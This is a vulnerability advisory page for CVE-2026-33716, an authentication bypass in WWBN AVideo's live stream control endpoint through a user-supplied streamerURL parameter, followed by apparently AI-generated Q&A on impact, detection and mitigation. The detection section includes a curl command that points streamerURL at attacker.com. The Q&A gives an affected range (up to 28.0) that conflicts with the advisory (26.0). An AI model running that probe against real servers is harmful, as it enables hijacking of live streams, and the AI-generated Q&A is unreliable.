CVE-2026-33716
Received Received - Intake
Authentication Bypass in WWBN AVideo Live Stream Control

Publication date: 2026-03-23

Last updated on: 2026-03-25

Assigner: GitHub, Inc.

Description
WWBN AVideo is an open source video platform. In versions up to and including 26.0, the standalone live stream control endpoint at `plugin/Live/standAloneFiles/control.json.php` accepts a user-supplied `streamerURL` parameter that overrides where the server sends token verification requests. An attacker can redirect token verification to a server they control that always returns `{"error": false}`, completely bypassing authentication. This grants unauthenticated control over any live stream on the platform, including dropping active publishers, starting/stopping recordings, and probing stream existence. Commit 388fcd57dbd16f6cb3ebcdf1d08cf2b929941128 contains a patch.
CVSS Scores
EPSS Scores
Probability:
Percentile:
Meta Information
Published
2026-03-23
Last Modified
2026-03-25
Generated
2026-05-07
AI Q&A
2026-03-23
EPSS Evaluated
2026-05-05
NVD
EUVD
Affected Vendors & Products
Showing 1 associated CPE
Vendor Product Version / Range
wwbn avideo to 26.0 (inc)
Helpful Resources
Exploitability
CWE
CWE Icon
KEV
KEV Icon
CWE ID Description
CWE-287 When an actor claims to have a given identity, the product does not prove or insufficiently proves that the claim is correct.
Attack-Flow Graph
AI Powered Q&A
Can you explain this vulnerability to me?

CVE-2026-33716 is a critical vulnerability in the WWBN AVideo platform affecting versions up to 28.0. It exists in the live stream control endpoint at `plugin/Live/standAloneFiles/control.json.php`, which accepts a user-supplied `streamerURL` parameter without validation.

An attacker can supply a malicious `streamerURL` that redirects token verification requests to a server they control. This malicious server always returns a response indicating no error, effectively bypassing authentication.

By bypassing authentication, the attacker gains unauthenticated control over live streams, including the ability to drop active publishers, start or stop recordings, and probe whether streams are active.

Additionally, SSL verification is disabled in the HTTP requests used for token verification, enabling Server-Side Request Forgery (SSRF) attacks where the server can be tricked into making requests to attacker-controlled or internal URLs.


How can this vulnerability impact me? :

This vulnerability can have several serious impacts:

  • Denial of Service: Attackers can terminate any live broadcast without authentication, disrupting service availability.
  • Unauthorized Recording: Attackers can start recording live streams without permission, risking privacy breaches.
  • Stream Enumeration: Attackers can probe and discover active stream names, potentially exposing sensitive information.
  • Server-Side Request Forgery (SSRF): The server makes outbound HTTP requests to attacker-controlled URLs without SSL verification, which could expose internal services or lead to further exploitation.

No authentication or user interaction is required to exploit this vulnerability, making it highly accessible to attackers.


How does this vulnerability affect compliance with common standards and regulations (like GDPR, HIPAA)?:

I don't know


How can this vulnerability be detected on my network or system? Can you suggest some commands?

[{'type': 'paragraph', 'content': 'This vulnerability can be detected by monitoring requests to the live stream control endpoint at `plugin/Live/standAloneFiles/control.json.php` that include the `streamerURL` parameter. Suspicious requests where `streamerURL` points to an external or unexpected URL may indicate exploitation attempts.'}, {'type': 'paragraph', 'content': 'You can use network monitoring tools or web server logs to identify such requests.'}, {'type': 'paragraph', 'content': 'Example commands to detect suspicious activity include:'}, {'type': 'list_item', 'content': "Using grep on web server access logs to find requests with the `streamerURL` parameter: `grep 'control.json.php' /var/log/apache2/access.log | grep 'streamerURL='`"}, {'type': 'list_item', 'content': "Using curl to test if the endpoint accepts user-supplied `streamerURL`: `curl -G 'http://yourserver/plugin/Live/standAloneFiles/control.json.php' --data-urlencode 'streamerURL=http://attacker.com/'`"}, {'type': 'list_item', 'content': 'Monitoring outbound HTTP requests from the server to unexpected URLs, which may indicate SSRF exploitation.'}] [1]


What immediate steps should I take to mitigate this vulnerability?

Immediate mitigation steps include removing the ability for users to supply the `streamerURL` parameter in the `control.json.php` endpoint.

Instead, configure the `streamerURL` to be sourced only from trusted server configuration or hard-coded values within the application.

Apply the patch from commit 388fcd57dbd16f6cb3ebcdf1d08cf2b929941128 which enforces this change and sanitizes other parameters to prevent path traversal.

Additionally, monitor and restrict outbound HTTP requests from the server to prevent SSRF attacks.

If possible, upgrade to a fixed version of the WWBN AVideo platform that includes these security improvements.


Ask Our AI Assistant
Need more information? Ask your question to get an AI reply (Powered by our expertise)
0/70
EPSS Chart